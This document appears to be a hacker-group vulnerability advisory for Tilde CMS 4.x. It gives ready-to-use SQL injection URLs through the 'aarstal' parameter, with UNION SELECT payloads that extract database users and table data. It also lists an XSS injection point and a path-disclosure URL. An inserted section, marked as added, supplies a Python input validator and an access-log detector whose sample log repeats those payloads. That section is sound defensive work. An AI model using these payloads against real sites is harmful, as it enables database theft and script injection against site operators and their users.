---------------------------------------------------------------
____ __________ __ ____ __
/_ | ____ |__\_____ \ _____/ |_ /_ |/ |_
| |/ \ | | _(__ <_/ ___\ __\ ______ | \ __\
| | | \ | |/ \ \___| | /_____/ | || |
|___|___| /\__| /______ /\___ >__| |___||__|
\/\______| \/ \/
---------------------------------------------------------------

Http://www.inj3ct-it.org Staff[at]inj3ct-it[dot]org

---------------------------------------------------------------

Tilde CMS <= v. 4.x "aarstal" parameter of "yeardetail" SQL Injection

---------------------------------------------------------------

#By KiNgOfThEwOrLd

---------------------------------------------------------------
PoC

D'u need an explanation?!? I don't think so :P
---------------------------------------------------------------
SQL Injection

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=%27

Little examples

Using the user() and database() functions u can get some information about the database, such as:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/*

Or u can get some records from the database, like:

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,[row_name],4,[row_name]/**/from/**/[table_name]/*

D'u want the tables n' the rows? Find it yourself ;P
---------------------------------------------------------------
something else..

Xss Vulnerability

http://[target]/[tilde_path]/index.php?id=[yeardetail_id]&mode=yeardetail&aarstal=[XSS]
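Added example (not part of the original advisory, and not Tilde CMS code): both the SQL injection and the XSS above go through the same "aarstal" parameter of mode=yeardetail, and "aarstal" is Danish for "year", so a legitimate value is four digits and nothing else. The Python below uses that as an allow-list check in two roles: as the server-side validation a patched install would apply before the value reaches the query or the page, and as a detection rule run over access log lines, where anything that is not a plain year is flagged and roughly classified (quote or UNION...SELECT as SQL injection, angle brackets as XSS). The log lines, client IPs and the /tilde/ path are constructed for the example.

```python
import re
from typing import List, Optional, Tuple
from urllib.parse import parse_qs, urlsplit

# Constructed sample access log lines in Common Log Format. They were written for
# this illustration; they are not traffic captured from a real Tilde CMS site.
SAMPLE_LOG = """\
10.0.0.5 - - [10/Oct/2023:13:55:36 +0000] "GET /tilde/index.php?id=7&mode=yeardetail&aarstal=2007 HTTP/1.1" 200 5123
10.0.0.9 - - [10/Oct/2023:13:56:01 +0000] "GET /tilde/index.php?id=7&mode=yeardetail&aarstal=%27 HTTP/1.1" 500 412
10.0.0.9 - - [10/Oct/2023:13:56:12 +0000] "GET /tilde/index.php?id=7&mode=yeardetail&aarstal=999/**/union/**/select/**/1,2,user(),database(),5/* HTTP/1.1" 200 6001
10.0.0.9 - - [10/Oct/2023:13:57:40 +0000] "GET /tilde/index.php?id=7&mode=yeardetail&aarstal=%3Cscript%3Ealert(1)%3C/script%3E HTTP/1.1" 200 5200
10.0.0.3 - - [10/Oct/2023:13:58:02 +0000] "GET /tilde/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on HTTP/1.1" 200 900
"""

# "aarstal" means "year": the only legitimate shape is exactly four digits.
YEAR_RE = re.compile(r"^\d{4}$")
# /**/ is the whitespace substitute used in the advisory's payloads; collapse it
# to a space so the UNION ... SELECT shape becomes visible to the word regex.
COMMENT_RE = re.compile(r"/\*.*?\*/")
UNION_RE = re.compile(r"\bunion\b.*\bselect\b", re.IGNORECASE)
# Common Log Format request line: client IP, request target, HTTP status.
REQUEST_RE = re.compile(
    r'^(\S+) \S+ \S+ \[[^\]]+\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})'
)


def is_valid_year(value: str) -> bool:
    """Allow-list check (assumed mitigation, not Tilde's own code): a fixed
    yeardetail handler should reject anything but four digits before the value
    is used in SQL or echoed into HTML."""
    return YEAR_RE.fullmatch(value) is not None


def classify_aarstal(value: str) -> Optional[str]:
    """Return None for a plain year, otherwise a coarse label for the anomaly.
    `value` is the already percent-decoded parameter value."""
    if is_valid_year(value):
        return None
    normalized = COMMENT_RE.sub(" ", value)
    if "'" in normalized or UNION_RE.search(normalized):
        return "sql-injection"
    if "<" in normalized or ">" in normalized:
        return "xss"
    return "malformed"


def scan_log(text: str) -> List[Tuple[str, int, str, str]]:
    """Return (client_ip, status, decoded aarstal value, reason) for every
    request whose aarstal parameter fails the year check."""
    findings = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue
        ip, target, status = match.groups()
        # parse_qs percent-decodes the values, so %27 arrives here as a quote.
        params = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for value in params.get("aarstal", []):
            reason = classify_aarstal(value)
            if reason is not None:
                findings.append((ip, int(status), value, reason))
    return findings


if __name__ == "__main__":
    for ip, status, value, reason in scan_log(SAMPLE_LOG):
        print(f"{ip} status={status} reason={reason} aarstal={value!r}")
```

Run against the constructed log the scan reports the three hostile requests from 10.0.0.9 and stays silent on the legitimate aarstal=2007 request and on the search request, which carries no aarstal parameter at all. A 200 response on a flagged request is the interesting case for triage, since the same allow-list check applied in the handler would have turned those into rejections.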
---------------------------------------------------------------
Full Path Disclosure

http://[target]/[tilde_path]/index.php?search=%3C&mode=search&sider=on&tss=on&linier=on
---------------------------------------------------------------